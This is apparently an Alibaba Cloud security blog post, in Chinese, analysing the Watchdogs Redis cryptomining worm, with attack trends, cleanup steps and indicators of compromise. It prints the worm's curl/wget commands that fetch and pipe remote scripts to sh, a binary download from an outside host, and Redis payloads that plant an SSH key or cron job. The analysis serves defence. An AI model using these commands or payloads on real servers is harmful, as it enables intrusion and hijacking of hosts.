Watchdogs利用Redis實施大規模挖礦，常見數據庫蠕蟲如何破？

背景

2月20日17時許，阿里雲安全監測到一塊兒大規模挖礦事件，判斷爲Watchdogs蠕蟲致使，並在第一時間進行了應急處置。

該蠕蟲短期內即形成大量Linux主機淪陷，一方面是利用Redis未受權訪問和弱密碼這兩種常見的配置問題進行傳播，另外一方面從known_hosts文件讀取ip列表，用於登陸信任該主機的其餘主機。這兩種傳播手段都不是第一次用於蠕蟲，但結合在一塊兒爆發出巨大的威力。

然而Watchdogs並非第一個形成這般影響的Redis蠕蟲。截至目前，Redis配置問題已慘遭40餘種蠕蟲攻擊和利用；此外，其餘種類數據庫的配置問題，也難保不在未來成爲黑客的目標。

所以，本文在分析這次Watchdogs挖礦蠕蟲、提供清理建議的同時，也分析了數據庫蠕蟲的發展趨勢，並針對相似的大規模入侵事件的應急和預防給出建議。

Watchdogs 挖礦蠕蟲簡介

該蠕蟲的感染路徑以下圖所示。

蠕蟲傳播方式

攻擊者首先掃描存在未受權訪問或弱密碼的Redis，並控制相應主機去請求如下地址：

https://pastebin.com/raw/sByq0rym

該地址包含的命令是請求、base64解碼並執行另外一個url地址的內容：

(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh

而https://pastebin.com/raw/D8E71JBJ 的內容解碼後爲一個bash腳本，腳本中又包含下載惡意程序Watchdogs的指令。

(curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs

如上圖所示，本次蠕蟲的橫向傳播分爲兩塊。

一是Bash腳本包含的以下內容，會直接讀取主機上的/root/.ssh/known_hosts和/root/.ssh/id_rsa.pub文件，用於登陸信任當前主機的機器，並控制這些機器執行惡意指令。

二是Bash腳本下載的Watchdogs程序，經過對Redis的未受權訪問和爆破、以及對SSH的爆破，進行橫向傳播。

具體爲表現爲，Watchdogs程序的Bbgo()函數中，首先獲取要攻擊的ip列表

隨後嘗試登陸其餘主機的ssh服務，一旦登陸成功則執行惡意腳本下載命令

在Ago()函數中，則表現爲針對其餘主機Redis的掃描和攻擊。

惡意Bash腳本

除了下載Watchdogs程序和橫向傳播外，Bash腳本還具備如下幾項功能

1.將下載自身的指令添加到crontab定時任務，10分鐘執行一次

2.殺死同類的挖礦殭屍木馬進程

殺死cpu佔用大於80%的其餘進程

簡而言之，bash腳本主要是完成惡意程序植入、持久化和一部分的橫向傳播功能。

Watchdogs分析

Watchdogs程序爲elf可執行文件，由go語言編譯，其主要函數結構以下圖所示。

1.LibiosetWrite()

該函數主要執行libioset.so文件的寫入

2.Cron()

將惡意下載命令添加到/etc/cron.d/root等多個文件中，定時執行，加大清理難度

3.KsoftirqdsWriteRun()

解壓並寫入挖礦程序及其配置文件

Bbgo()和Ago()函數的功能在「蠕蟲傳播方式」一節已有介紹，此處再也不贅述。

綜上，Watchdogs程序在Bash腳本執行的基礎上，將進一步進行挖礦程序的釋放和執行、惡意so文件寫入以及剩餘的橫向傳播。

libioset.so分析

如圖是libioset.so的導出函數表，包括unlink, rmdir, readdir等。

這裏以執行rm命令必須調用的unlink()函數爲例。

它只對不包含"ksoftirqds"、"ld.so.preload"、"libioset.so"這幾個字符串的文件調用正常的unlink()，致使幾個文件沒法被正常刪除。

其餘幾個命令，如readdir也是相似，沒法正常返回關於惡意程序的結果。

而fopen函數更是變本加厲，因爲系統查詢cpu使用狀況和端口占用狀況時，都會調用fopen，因而攻擊者hook了這一函數，使其在讀取'/proc/stat'和'/proc/net/tcp'等文件時，調用僞造函數

其中forge_proc_cpu()函數，將返回硬編碼的字符串

這種對查看系統狀態功能的惡意hook，致使用戶難以經過簡單自查，肯定挖礦是否存在以及挖礦進程是哪一個。

「許多黑客模仿個人代碼」——數據庫蠕蟲趨勢統計

這次的Watchdogs挖礦蠕蟲與18年出現的kworkerd蠕蟲出自同一位做者（關於kworkerd挖礦僵屍網絡參見《2018年雲上挖礦分析報告》），由於它們使用了相同的錢包地址和類似的攻擊手法。此外做者在惡意腳本末尾的註釋也印證了這點：

#1.If you crack my program, please don't reveal too much code online.Many hacker boys have copied my kworkerds code,more systems are being attacked.(Especially libioset)...

這段註釋同時也揭露了一個事實，「許多黑客模仿個人代碼」——當一個攻擊者採起了某種攻擊手法並取得成功，其餘攻擊者會紛紛模仿，很快將該手段加入本身的「攻擊大禮包」。

這種模仿的結果是，據阿里雲安全不徹底統計，利用Redis未受權訪問等問題進行攻擊的蠕蟲，數量已從2018年中的一個，上漲到現在的40餘個，其中不乏DDG、8220這樣臭名昭著的挖礦團伙。此外大部分近期新出現的蠕蟲，都會加上Redis利用模塊，由於實踐證實互聯網上錯誤配置的Redis數據庫數量龐大，能從其中分一杯羹，攻擊者的盈利就能有很大的提高。

於是若是不保護好Redis，用戶面臨的將不是一個蠕蟲，而是40餘個蠕蟲此起彼伏的攻擊。

下圖所示爲近半年來，針對Redis的攻擊流量和目標機器數量趨勢，從中不難看出Redis攻擊逐漸被各大僵屍網絡採用，並在2018年10月11月保持很是高的攻擊量；然後在經歷了3個月左右的沉寂期後，在今年2月再次爆發。

而Redis自己遭受攻擊的主流方法也通過了三個階段

1.攻擊者對存在未受權訪問的Redis服務器寫入ssh key，從而能夠暢通無阻登陸ssh服務

具體爲執行如下payload

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa 【sshkey】 root@kali\n\n\n"
save

其中【sshkey】表示攻擊者的密鑰

2.攻擊者對存在未受權訪問的Redis服務器寫入crontab文件，定時執行惡意操做

具體爲執行如下payload

config set dir /var/spool/cron
config set dbfilename root
set x "【evil command】"
save

其中【evil command】表示定時執行的惡意命令

3.以上兩個階段中僅對Redis徹底沒有驗證便可訪問的狀況，第三個階段則開始針對設置了密碼驗證，但密碼較弱的Redis進行攻擊，受害範圍進一步擴大。

然而Redis並非惟一一個受到黑客「青眼」的數據庫。以下表所示，SQL Server, Mysql, Mongodb這些經常使用數據庫的安全問題，也被多個挖礦僵屍網絡所利用；利用方式集中在未受權訪問、密碼爆破和漏洞利用。

Watchdogs入侵修復及清理方法

1.首先中止cron服務，避免因其不斷執行而致使惡意文件反覆下載執行。

若是操做系統可使用service命令，則執行

service crond stop

若是沒有service命令，執行

/etc/init.d/cron stop

2.隨後使用busybox刪除如下兩個so文件：

sudo busybox rm -f /etc/ld.so.preload
sudo busybox rm -f /usr/local/lib/libioset.so
sudo ldconfig

busybox是一個小巧的unix工具集，許多Linux系統裝機時已集成。使用它進行刪除是由於系統自帶的rm命令須要進行動態so庫調用，而so庫被惡意hook了，沒法進行正常刪除；而busybox的rm是靜態編譯的，無需調用so文件，因此不受影響。

3.清理惡意進程

sudo kill -9 `ps -ef|grep Watchdogs|grep -v grep |awk '{print $2}'`
sudo kill -9 `ps -ef|grep ksoftirqds|grep -v grep |awk '{print $2}'`

4.清理cron相關文件，重啓服務，具體爲檢查如下文件並清除其中的惡意指令：

/var/spool/cron/crontabs/root
/var/spool/cron/root
/etc/cron.d/root

以後執行

service crond start

或

/etc/init.d/cron start

安全建議

數字加密貨幣的獲取依賴計算資源的特質，催生了黑客進行大規模入侵的動機和土壤；相似Watchdogs蠕蟲這樣的數據庫入侵事件，不是第一塊兒，也不會是最後一塊兒。阿里雲做爲「編寫時即考慮安全性」的平臺，提供良好的安全基礎設施和豐富的安全產品，幫助用戶抵禦挖礦和入侵，同時提供如下安全建議：

1.在入侵發生以前，增強數據庫服務的密碼，儘可能不將數據庫服務開放在互聯網上，或根據實際狀況進行訪問控制（ACL）。這些措施可以幫助有效預防挖礦、勒索等攻擊。平時還要注意備份資料，重視安全產品告警。

2.若是懷疑主機已被入侵挖礦，對於自身懂安全的用戶，在攻擊者手段較簡單的狀況下，能夠經過自查cpu使用狀況、運行進程、定時任務等方式，鎖定入侵源頭。

3.對於攻擊者採用較多隱藏手段的攻擊（如本次的Watchdogs蠕蟲，使ps、top等系統命令失效），建議使用阿里雲安全的下一代雲防火牆產品，其阻斷惡意外聯、可以配置智能策略的功能，可以有效幫助防護入侵。哪怕攻擊者在主機上的隱藏手段再高明，下載、挖礦、反彈shell這些操做，都須要進行惡意外聯；雲防火牆的攔截將完全阻斷攻擊鏈。此外，用戶還能夠經過自定義策略，直接屏蔽pastebin.com、thrysi.com等普遍被挖礦蠕蟲利用的網站，達到阻斷入侵的目的。

如圖是雲防火牆幫助用戶攔截這次Watchdogs蠕蟲下載的例子，圖中共攔截23次對pastebin.com的請求；這些攔截致使主機未下載惡意腳本，從而就不會發起對thrysi.com的請求，故規則命中次數爲0。

以上截圖代表Watchdogs的攻擊鏈未能執行到下一步，攔截起到了很好的效果。

4.對於有更高定製化要求的用戶，能夠考慮使用阿里雲安全管家服務。購買服務後將有經驗豐富的安全專家提供諮詢服務，定製適合您的方案，幫助加固系統，預防入侵。入侵事件發生後，也可介入直接協助入侵後的清理、事件溯源等，適合有較高安全需求的用戶，或未僱傭安全工程師，但但願保障系統安全的企業。

IOC

錢包地址

46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava

礦池地址
xmr.f2pool.com

惡意url
pastebin.com/raw/sByq0rym

thyrsi.com/t6/672/1550667515x1822611209.jpg

惡意文件

 

原文連接 更多技術乾貨 請關注阿里云云棲社區微信號 ：yunqiinsight